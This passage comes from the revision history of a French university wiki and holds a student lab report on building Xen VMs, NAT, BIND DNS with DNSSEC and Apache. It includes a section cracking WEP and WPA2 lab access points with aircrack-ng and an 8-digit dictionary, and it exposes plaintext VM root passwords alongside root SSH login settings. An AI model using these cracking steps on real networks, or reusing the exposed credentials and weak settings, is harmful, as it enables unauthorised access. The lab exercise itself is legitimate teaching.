IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
<br />
<br />
<br />
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3<br />
<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b --write airodump --bssid 04:DA:D2:9C:50:54 -c4</code><br />
<br />
Et en parallele on lance ceci jusqu'a ce que la clef soit trouvé :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>ou alors avec crunch :<br />
<br />
<code>crunch 8 8 0123456789 -o dictionnaire_8_chiffres.txt</code><br />
<br />
<br />
Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande :<code>sudo airodump-ng wlx40a5ef0f679b --write airodumpWPA --bssid 44:AD:D9:5F:87:04 -c13</code><br />
<br />
Et ensuite après avoir récuperer 1 data minimum :<br />
<br />
<code>aircrack-ng airodump-01.cap</code><br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12143
Atelier SysRes SE4 2025/2026 E5
2026-02-10T14:09:51Z
<p>Cpayet : /* Utiles */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
SSH Fingerprint : SHA256:FbqBOG+0bBjuQBOlAytAlbMV/9VoJ8BAlFadG/VaGD4 (ED25519)<br />
SSH Fingerprint : SHA256:FCEtQGUhMhN9DDtTmt5zts/9PeC7ahnmJA7UOhMnGeg (RSA)<br />
Root Password : ekrmCSKb3ZAxXSYvNpjbiSK<br />
</syntaxhighlight><br />
<br />
==== Etape 4 : ====<br />
PHRASE MANQUANTE<syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.Manjaro.cfg<br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
xen create /etc/xen/SE4.LinusTorvalds.cfg<br />
</syntaxhighlight>On vérifie la liste des machines lancées via : <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
===== Nos résultats : =====<br />
<syntaxhighlight lang="shell"><br />
Name ID Mem VCPUs State Time(s)<br />
SE4.CachyOS 83 2048 1 -b---- 5.6<br />
SE4.Manjaro 85 2048 1 -b---- 5.8<br />
SE4.LinusTorvalds 87 2048 1 -b---- 5.3<br />
</syntaxhighlight><br />
<br />
==== Etape 5 : Partition ====<br />
<br />
===== Sur capbreton =====<br />
<br />
On partionne avec cette commande :<syntaxhighlight lang="shell"><br />
lvcreate -n SE4.CachyOS.var -L 10G virtual<br />
</syntaxhighlight><br />
On éteint notre machine : <syntaxhighlight lang="shell"><br />
xen shutdown SE4.CachyOS<br />
</syntaxhighlight><br />
Et on modifie :<syntaxhighlight lang="shell"><br />
vim /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
disk = [<br />
[...],<br />
'phy:/dev/virtual/SE4.CachyOS.home,xvda3,w',<br />
'phy:/dev/virtual/SE4.CachyOS.var,xvdb1,w'<br />
]<br />
</syntaxhighlight><br />
<br />
===== Sur la machine mandataire =====<br />
<br />
Nous ajoutons les partitions dans '''''/etc/fstab''''' : <syntaxhighlight lang="shell"><br />
/dev/xvda3 /var ext4 defaults 0 2<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
</syntaxhighlight><br />
<br />
Nous formatons les partitions avant de les utiliser : <syntaxhighlight lang="shell"><br />
mkfs -t ext4 /dev/xvda3<br />
mkfs -t ext4 /dev/xvdb1<br />
</syntaxhighlight><br />
<br />
Nous copions le contenu de '''/var''' : <syntaxhighlight lang="shell"><br />
mount /dev/xvda3 /mnt<br />
mv /var/* /mnt<br />
umount /mnt<br />
</syntaxhighlight><br />
<br />
Nous montons ensuite automatiquement les partitions définies dans '''/etc/fstab''' : <syntaxhighlight lang="shell"><br />
mount -a<br />
</syntaxhighlight><br />
<br />
===== De nouveaux sur capbreton =====<br />
On redémarre notre machine : <syntaxhighlight lang="shell"><br />
xen create /etc/xen/SE4.CachyOS.cfg<br />
</syntaxhighlight><br />
<br />
Ensuite on se connecte à notre VM via :<syntaxhighlight lang="shell"><br />
xen console SE4.CachyOS<br />
</syntaxhighlight><br />
<br />
===== Machines de Service - CachyOS & Manjaro =====<br />
Dans notre VM :<br />
<br />
On modifie :<syntaxhighlight lang="shell"><br />
vim /etc/network/interfaces<br />
</syntaxhighlight><br />
Et on ajoute ceci :<syntaxhighlight lang="shell"><br />
auto lo<br />
iface lo inet loopback<br />
<br />
auto eth0<br />
iface eth0 inet static<br />
address 192.168.10.3/24<br />
gateway 192.168.10.1<br />
<br />
# Pour l'ipv6<br />
auto eth1<br />
iface eth1 inet6 auto<br />
<br />
</syntaxhighlight><br />
<br />
* 172.60.0.3 est l'adresse IPV4 de la VM CachyOS<br />
<br />
===== Machine Mandataire - LinusTorvalds =====<br />
La machine mandataire agit comme passerelle IPv4 pour les machines de services. Voici sa configuration réseau :<br />
<br />
La machine mandataire va posséder trois adresses. Une adresse IPv6 routée, une adresse IPv4 routée et une adresse IPv4 pour le réseau privé avec ces deux machines de services. Pour ce faire, nous devons au préalable configurer une nouvelle interface eth1 pour y intégrer la seconde adresse IPv4.<br />
<br />
Sur capbreton, depuis <code>/etc/xen/SE4.CachyOS.cfg :</code><syntaxhighlight lang="shell"><br />
vif = [[...], 'mac=00:16:3E:8B:45:ED,bridge=SE4']<br />
</syntaxhighlight>Pour l'adresse mac on prend celui existant et on fait +1.<br />
<br />
Depuis <code>/etc/resolv.conf </code>:<syntaxhighlight lang="shell"><br />
nameserver 8.8.8.8<br />
<br />
</syntaxhighlight><br />
<br />
==== SSH 476 ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3 ====<br />
<syntaxhighlight lang="shell"><br />
apt update<br />
apt upgrade<br />
<br />
apt install ssh<br />
apt install bind9<br />
apt install apache2<br />
</syntaxhighlight>(Dans TOUTES les VMs)<br />
<br />
On active le SSH en ajoutant dans <code>/etc/ssh/sshd_config</code> :<syntaxhighlight lang="shell"><br />
PermitRootLogin yes<br />
</syntaxhighlight>Pour redemarrer le service ssh :<syntaxhighlight lang="shell"><br />
/etc/init.d/ssh restart<br />
</syntaxhighlight>Pour la machine mandataire, ensuite après avoir reboot on peut faire dans nos machines de services :<syntaxhighlight lang="shell"><br />
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24<br />
</syntaxhighlight> <br />
<br />
==== Mascarade ====<br />
Sur la mandataire : <syntaxhighlight lang="shell"><br />
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22<br />
iptables-save<br />
<br />
</syntaxhighlight>Et on décommente cette ligne dans <code>/etc/sysctl.conf</code> : <syntaxhighlight lang="shell"><br />
net.ipv4.ip_forward=1<br />
</syntaxhighlight>Et maintenant nous pouvons nous connecter à notre machine de service en ssh : <syntaxhighlight lang="shell"><br />
#IPV4<br />
ssh root@193.48.57.166 -p 2202<br />
# IPV6<br />
ssh root@2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
</syntaxhighlight><br />
<br />
==== DNS ====<br />
Tout d'abord, il faut modifier <code>/etc/bind/named.conf.local</code> : <syntaxhighlight lang="shell"><br />
zone "archlinuxbtw.lol" {<br />
type master;<br />
file "/etc/bind/myZones/db.archlinuxbtw.lol";<br />
allow-transfer{secondaries;};<br />
notify yes;<br />
};<br />
<br />
acl "secondaries"{<br />
192.168.10.2;<br />
2001:660:4401:60a0:216:3eff:fe36:79d9;<br />
};<br />
<br />
zone "archlinux.lol" {<br />
type secondary;<br />
file "/etc/bind/backup/db.archlinux.lol";<br />
primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};<br />
};<br />
<br />
</syntaxhighlight>J'ai ensuite créée un dossier myZones puis j'ai créer db.archlinuxbtw.lol et j'y ai ajouter :<syntaxhighlight lang="shell"><br />
$TTL 400<br />
<br />
@ IN SOA ns.archlinuxbtw.lol admin.archlinuxbtw.lol (<br />
3609 ; Numero de version<br />
21600 ; Rafraichissement (6h)<br />
3600 ; Re-tentative (1h)<br />
2592000 ; Expiration (30j)<br />
86400 ; Cache negatif (24h)<br />
);<br />
<br />
IN NS ns.archlinuxbtw.lol.<br />
IN NS ns.archlinux.lol.<br />
@ IN A 193.48.57.166<br />
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
ns IN A 193.48.57.166<br />
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8b:45ed<br />
<br />
www IN CNAME archlinuxbtw.lol<br />
<br />
</syntaxhighlight>Ensuite on restart le service via : <code>service named restart</code><br />
<br />
<br />
Création d'une clé<syntaxhighlight lang="shell"><br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinuxbtw.lol.key -out archlinuxbtw.csr<br />
</syntaxhighlight><br />
[[Fichier:DNS Check.png|centré|vignette|452x452px|DNS Checker ]]<br />
Notre DNS est bien reconnu et la commande <code>dig @8.8.8.8 archlinuxbtw.lol</code> c'est grâce au Glue records.<br />
<br />
<br />
Génération des clés<br />
<br />
<br />
Changement nom machine <code>nano /etc/hostname : CachyOS</code><br />
<br />
Et dans /etc/hosts:<br />
<br />
127.0.1.1 archlinuxbtw.lol SE4.CachyOS<br />
<br />
==== DNSSEC ====<br />
Afin de protéger notre DNS contre des possibles attaques nous utiliserons DNSSEC. Ici nous utiliserons la politique DNSSEC : <code>"dnspol"</code><br />
Ensuite on crée le dossier keys et on donne les droits a bind d'écrire dedans avec :<syntaxhighlight lang="shell"><br />
mkdir /etc/bind/keys <br />
chown bind:bind /etc/bind/keys <br />
chmod 750 /etc/bind/keys<br />
</syntaxhighlight>Pour ce faire, dans <code>named.conf.local</code> il faut rajouter les 3 lignes à partir de "key-directory" :<syntaxhighlight lang="shell"><br />
key-directory "/etc/bind/keys";<br />
dnssec-policy "dnspol"; // DNSSEC automatique<br />
inline-signing yes;<br />
<br />
[...]<br />
<br />
dnssec-policy "dnspol" {<br />
keys {<br />
ksk key-directory lifetime unlimited algorithm 13;<br />
zsk key-directory lifetime unlimited algorithm 13;<br />
};<br />
nsec3param;<br />
};<br />
<br />
</syntaxhighlight>Pour l'activer, il faut restart bind9 avec <code>systemctl restart bind9</code><br />
<br />
Il ne reste qu'à ajouter la clé KSK sur Gandi et ensite on peut voir s'il fonctionne bien grace au site suivant : <nowiki>https://dnsviz.net</nowiki><br />
[[Fichier:DNSSec.png|centré|vignette|DNSSec]]<br />
<br />
<br />
Et on peut voir que nos clefs on bien été générer : <syntaxhighlight lang="shell"><br />
root@CachyOS:/etc/bind# ls keys/<br />
Karchlinuxbtw.lol.+013+24458.key Karchlinuxbtw.lol.+013+56682.key<br />
Karchlinuxbtw.lol.+013+24458.private Karchlinuxbtw.lol.+013+56682.private<br />
Karchlinuxbtw.lol.+013+24458.state Karchlinuxbtw.lol.+013+56682.state<br />
<br />
</syntaxhighlight><br />
<br />
==== Apache ====<br />
Dans ce repertoire <code>/etc/apache2/sites-availab</code>le : touch archlinuxbtw.lol.conf <br />
<br />
<br />
Je genere un crt via la commande : <br />
<br />
openssl x509 -req -days 365 -in archlinuxbtw.csr -signkey archlinuxb<br />
<br />
tw.lol.key -out archlinuxbtw.lol.crt<br />
<br />
<br />
Et je deplace mes fichiers dans : <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.crt /etc/ssl/certs/ <br />
<br />
root@CachyOS:~# mv archlinuxbtw.lol.key /etc/ssl/private/ <br />
<br />
root@CachyOS:~# chmod 600 /etc/ssl/private/archlinuxbtw.lol.key<br />
<br />
Pour arreter le service par defaut : a2dissite 000-default.conf <br />
<br />
Et on verifie avec la commande : apache2ctl -S<br />
<br />
Iptable pour atteindres les ports https : <code># HTTP iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.3:80 # HTTPS iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.3:443 iptables-save</code><br />
<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 80 -j ACCEPT<br />
<br />
iptables -A FORWARD -p tcp -d 192.168.10.3 --dport 443 -j ACCEPT<br />
<br />
<br />
<br />
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.3<br />
<br />
==== Effraction WiFi ====<br />
<br />
===== Cassage WEP =====<br />
Il faut tout faire sur la zabeth13 comme on avait tester sur 4 machines dans la semaine avec mon binome les cartes réseaux des autres machines ne marchent pas. <br />
<br />
Avec ip link je vois que l'interface wifi se nomme <code>wlx40a5ef0f679b</code>.<br />
<br />
On peut alors recuperer le bssid de notre réseau wifi a crack. Je suis le numéro 5 donc je dois crack la cracotte05 : <br />
<br />
<code>sudo airodump-ng wlx40a5ef0f679b</code><br />
<br />
<br />
Je recupere :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>04:DA:D2:9C:50:54 -63 27 5 0 4 54e. WEP WEP cracotte05</code> <br />
<br />
Je peux alors dump correctement en filtrant seulement le bon bssid et le bon channel via cette commande : <br />
<br />
<code>sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:54 -c4 --write log_airodump</code><br />
<br />
<br />
<br />
Et ensuite après avir récuperer 5000 data :<br />
<br />
<code>sudo aircrack-ng -b 04:DA:D2:9C:50:54 log_airodump-01.cap</code><br />
<br />
===== Cassage WPA-PKS =====<br />
Ce script python permet de creer un dictionnaire :<syntaxhighlight lang="python"><br />
with open("dictionnaire_8_chiffres.txt", "w") as f:<br />
for i in range(100000000): # Pour générer des nombres de 00000000 à 99999999<br />
f.write(f"{i:08d}\n") # Écrit le nombre avec 8 chiffres<br />
<br />
</syntaxhighlight>Ensuite après execution nous pouvons recuperer le fichier .txt créer.<br />
<br />
<br />
On récuperer le dump comme precedemment pour cette borne pour mon cas :<br />
<br />
<code>BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID</code><br />
<br />
<code>44:AD:D9:5F:87:04 -43 3 5 2 13 54e. WPA2 CCMP PSK kracotte05</code> <br />
<br />
<br />
=== Utiles ===<br />
<br />
=== XEN ===<br />
''<u>Liste des VMs allumées :</u>'' <syntaxhighlight lang="shell"><br />
xen list<br />
</syntaxhighlight><br />
<br />
''<u>Se connecter à la VM :</u>''<syntaxhighlight lang="shell"><br />
xen console <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
''<u>Sortir de la console xen :</u>''<syntaxhighlight lang="shell"><br />
Ctrl + Shift + 5<br />
</syntaxhighlight>''<u>Eteindre une VM :</u>'' <syntaxhighlight lang="shell"><br />
xen shutdown <nomMachine><br />
</syntaxhighlight>nomMachine : dans notre cas soit SE4.Manjaro | SE4.CachyOS | SE4.LinusTorvalds<br />
<br />
''<u>Allumer une VM :</u>''<syntaxhighlight lang="shell"><br />
xen create /etc/xen/<nomMachine>.cfg<br />
</syntaxhighlight></div>
Cpayet
https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E5&diff=12137
Atelier SysRes SE4 2025/2026 E5
2026-02-10T13:49:55Z
<p>Cpayet : /* Etape 1 : Connexion SSH */</p>
<hr />
<div>=== Compte rendu des commandes effectués ===<br />
<br />
==== Etape 1 : Connexion SSH ====<br />
ssh root@capbreton<br />
<br />
Mot de passe : <br />
<br />
==== Etape 2 : Créer un fichier dans le répertoire /etc/network/interfaces.d du Dom0 aux noms du binôme concerné ====<br />
On se déplace à ce répertoire :<syntaxhighlight lang="shell"><br />
cd /etc/network/interfaces.d/<br />
</syntaxhighlight>On créer ensuite ensuite un fichier aux noms de notre binôme et on l'édite :<syntaxhighlight lang="shell"><br />
touch SE42026_cpayet_tdelobel<br />
vim SE42026_cpayet_tdelobel<br />
<br />
</syntaxhighlight>Puis on donne un nom au bridge, ici c'est `pont_pacman`et on met dans le fichier ceci :<syntaxhighlight lang="shell"><br />
auto pont_pacman<br />
iface pont_pacman inet manual<br />
bridge_ports none<br />
up ip link set $IFACE up<br />
down ip link set $IFACE down<br />
</syntaxhighlight>Une fois le pont créer, il faut le démarrer :<syntaxhighlight lang="shell"><br />
ifup pont_pacman<br />
</syntaxhighlight><br />
<br />
==== Etape 3 : Création des VMs ====<br />
<syntaxhighlight lang="shell"><br />
xen-create-image --hostname=SE4.CachyOS --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.Manjaro --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
xen-create-image --hostname=SE4.LinusTorvalds --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force<br />
</syntaxhighlight>On adapte les hostnames en fonction des nom de nos machines. <br />
<br />
'''''IMPORTANT :''''' Les résultats des commandes sont à noter car ellles contiennent les mots de passe et autres informations importantes.<br />
<br />
===== Nos résultats : =====<br />
CachyOS : <syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.CachyOS<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:8B:45:EC<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:p+nECGSXOPvFjDjk+/x8adAn8JxTTPjuknCTcFZxJNk (DSA)<br />
SSH Fingerprint : SHA256:YaNMhK5ZFF/TshemMHSmt08R9uBPAnhNK134XEZ0CuY (ECDSA)<br />
SSH Fingerprint : SHA256:qQNuBNfAoySUPOFPplDh8p0ZPtxRulz/vbOq+Pm4gwM (ED25519)<br />
SSH Fingerprint : SHA256:psWV2TNuHsZcRelqipM7TJ/mE4cvFI+oxndg6nvCpCk (RSA)<br />
Root Password : 6nyCiterydiMtnxsPDRsUys<br />
<br />
</syntaxhighlight>Manjaro : <syntaxhighlight lang="shell"><br />
<br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.Manjaro<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:36:79:D8<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:n+ojtWyKBODRtEppjCvAp6nd2cjL/Ily54j0cM03lMc (DSA)<br />
SSH Fingerprint : SHA256:K+Qa9NAU3JIGsMy3LEYCgFbfL3ozuiRKG+U3XsbV5ow (ECDSA)<br />
SSH Fingerprint : SHA256:AJLfxk4Zz8BZflWYOS8mifapH+uAFgGKA3WSj6rN0NA (ED25519)<br />
SSH Fingerprint : SHA256:/6iWOWoii0nJsbScwVYIGQAbuTI1/YIpaRyRdBl8mwE (RSA)<br />
Root Password : PgvMbhYvgtksg8tmiJnVZnQ<br />
</syntaxhighlight>LinusTorvalds :<syntaxhighlight lang="shell"><br />
Installation Summary<br />
---------------------<br />
Hostname : SE4.LinusTorvalds<br />
Distribution : daedalus<br />
MAC Address : 00:16:3E:AA:BF:EF<br />
IP Address(es) : dynamic<br />
SSH Fingerprint : SHA256:ouY/2dce0YI/mJD9Qw68oKU0xdw6Cs9ybgJxRm/FKiI (DSA)<br />
SSH Fingerprint : SHA256:p5lZznE0q8j6c68YTF5toYgBugOkc0IopTO+Ce9SiZ8 (ECDSA)<br />
